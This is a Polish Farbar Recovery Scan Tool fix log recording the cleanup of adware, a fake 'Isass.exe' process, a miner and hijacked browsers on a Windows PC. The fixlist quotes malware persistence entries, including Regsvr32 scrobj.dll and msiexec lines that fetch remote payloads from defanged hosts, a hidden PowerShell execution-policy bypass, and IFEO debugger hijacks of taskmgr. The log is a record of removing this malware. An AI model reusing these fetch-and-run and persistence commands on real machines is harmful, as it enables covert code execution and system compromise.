Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 18-06-2017 01 Uruchomiony przez Barteczek (20-06-2017 08:32:47) Run:1 Uruchomiony z C:\FRST Załadowane profile: Barteczek (Dostępne profile: defaultuser0 & Barteczek) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-24] () <==== UWAGA R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [Brak podpisu cyfrowego] S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== UWAGA S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] <==== UWAGA S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] <==== UWAGA S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] <==== UWAGA Task: {0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {10A81261-90F5-46B2-9684-6D8778E04859} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {D48645EB-CC21-43F7-8FDE-9A023E2D224A} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.) Task: {E39F1B69-B55E-4D0E-954C-D79A1A0D5386} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1 Task: C:\Windows\Tasks\One System Care Task.job => C:\PROGRA~2\ONESYS~1\SystemConsole.exe <==== UWAGA Task: C:\Windows\Tasks\One System CarePeriod.job => <==== UWAGA HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) <===== UWAGA HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) <===== UWAGA HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== /q <===== UWAGA HKLM-x32\...\Run: [] => [X] IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== UWAGA HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== UWAGA HKLM\...\StartupApproved\Run32: => "Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "World of Tanks" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" DeleteKey: HKCU\Software\Bagsarah DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\KMSpico C:\Program Files (x86)\Bagsarah C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\ProxyGate C:\ProgramData\u3bO8YL0WR.ps1 C:\ProgramData\5f5e51cb-5c01-0 C:\ProgramData\5f5e51cb-4bd3-1 C:\ProgramData\MicrosoftCorporation C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat C:\Users\Barteczek\AppData\Local\Bagsarah C:\Users\Barteczek\AppData\Local\Firefox C:\Users\Barteczek\AppData\Local\minergate-cli C:\Users\Barteczek\AppData\Local\Mozilla C:\Users\Barteczek\AppData\LocalLow\Mozilla C:\Users\Barteczek\AppData\Roaming\BrowserModule C:\Users\Barteczek\AppData\Roaming\Firefox C:\Users\Barteczek\AppData\Roaming\Mozilla C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe C:\Users\Public\Documents\chrome C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\1111 C:\Windows\SysWOW64\1111111 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\3333333 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\GZ CMD: netsh advfirewall reset EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\OneDirveSrv => klucz pomyślnie usunięto OneDirveSrv => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\pgt_svc => klucz pomyślnie usunięto pgt_svc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeService => klucz pomyślnie usunięto iSafeService => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => klucz pomyślnie usunięto iSafeKrnlBoot => serwis pomyślnie usunięto iSafeNetFilter => Nie można zatrzymać usługi. HKLM\System\CurrentControlSet\Services\iSafeNetFilter => klucz pomyślnie usunięto iSafeNetFilter => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeKrnl => klucz pomyślnie usunięto iSafeKrnl => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => klucz pomyślnie usunięto iSafeKrnlKit => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => klucz pomyślnie usunięto iSafeKrnlMon => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => klucz pomyślnie usunięto iSafeKrnlR3 => serwis pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{10A81261-90F5-46B2-9684-6D8778E04859} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{10A81261-90F5-46B2-9684-6D8778E04859} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D48645EB-CC21-43F7-8FDE-9A023E2D224A} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D48645EB-CC21-43F7-8FDE-9A023E2D224A} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Windows_Antimalware_System_Host => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows_Antimalware_System_Host => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E39F1B69-B55E-4D0E-954C-D79A1A0D5386} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E39F1B69-B55E-4D0E-954C-D79A1A0D5386} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Windows_Antimalware_Host => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows_Antimalware_Host => klucz pomyślnie usunięto C:\Windows\Tasks\One System Care Task.job => pomyślnie przeniesiono C:\Windows\Tasks\One System CarePeriod.job => pomyślnie przeniesiono HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Local Security Authority Process => Wartość pomyślnie usunięto HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Local Security Authority Processor => Wartość pomyślnie usunięto HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKU\S-1-5-21-2811866817-1435534820-1235014540-1001_Classes\ChromeHTML => klucz pomyślnie usunięto HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32\\Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da} => Wartość pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da} => Wartość nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32\\Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da} => Wartość pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da} => Wartość nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32\\Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da} => Wartość pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da} => Wartość nie znaleziono. HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\World of Tanks => Wartość pomyślnie usunięto HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\World of Tanks => Wartość nie znaleziono. HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\DAEMON Tools Lite Automount => Wartość pomyślnie usunięto HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\DAEMON Tools Lite Automount => Wartość nie znaleziono. HKCU\Software\Bagsarah => klucz pomyślnie usunięto HKCU\Software\Firefox => klucz pomyślnie usunięto HKLM\SOFTWARE\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Bagsarah => klucz pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Firefox => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto C:\Program Files\KMSpico => pomyślnie przeniesiono C:\Program Files (x86)\Bagsarah => pomyślnie przeniesiono C:\Program Files (x86)\BiaoJi => pomyślnie przeniesiono "C:\Program Files (x86)\Elex-tech" => nie znaleziono. C:\Program Files (x86)\Firefox => pomyślnie przeniesiono C:\Program Files (x86)\ProxyGate => pomyślnie przeniesiono C:\ProgramData\u3bO8YL0WR.ps1 => pomyślnie przeniesiono C:\ProgramData\5f5e51cb-5c01-0 => pomyślnie przeniesiono C:\ProgramData\5f5e51cb-4bd3-1 => pomyślnie przeniesiono C:\ProgramData\MicrosoftCorporation => pomyślnie przeniesiono C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Local\Bagsarah => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Local\Firefox => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Local\minergate-cli => pomyślnie przeniesiono "C:\Users\Barteczek\AppData\Local\Mozilla" => nie znaleziono. C:\Users\Barteczek\AppData\LocalLow\Mozilla => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Roaming\BrowserModule => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Roaming\Firefox => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Roaming\Mozilla => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk => pomyślnie przeniesiono "C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks" => nie znaleziono. C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe => pomyślnie przeniesiono C:\Users\Public\Documents\chrome => pomyślnie przeniesiono C:\Users\Public\Documents\report.dat => pomyślnie przeniesiono C:\Users\Public\Documents\temp.dat => pomyślnie przeniesiono C:\Windows\SysWOW64\00 => pomyślnie przeniesiono C:\Windows\SysWOW64\11 => pomyślnie przeniesiono C:\Windows\SysWOW64\1111 => pomyślnie przeniesiono C:\Windows\SysWOW64\1111111 => pomyślnie przeniesiono C:\Windows\SysWOW64\33 => pomyślnie przeniesiono C:\Windows\SysWOW64\3333333 => pomyślnie przeniesiono C:\Windows\SysWOW64\55 => pomyślnie przeniesiono C:\Windows\SysWOW64\GZ => pomyślnie przeniesiono ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 41873 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 108019954 B Java, Flash, Steam htmlcache => 506 B Windows/system/drivers => 110411 B Edge => 10836 B Chrome => 366592 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 1782 B systemprofile32 => 128 B LocalService => 0 B NetworkService => 26236 B defaultuser0 => 128 B Barteczek => 57112495 B RecycleBin => 365993605 B EmptyTemp: => 507.1 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 08:33:13 ====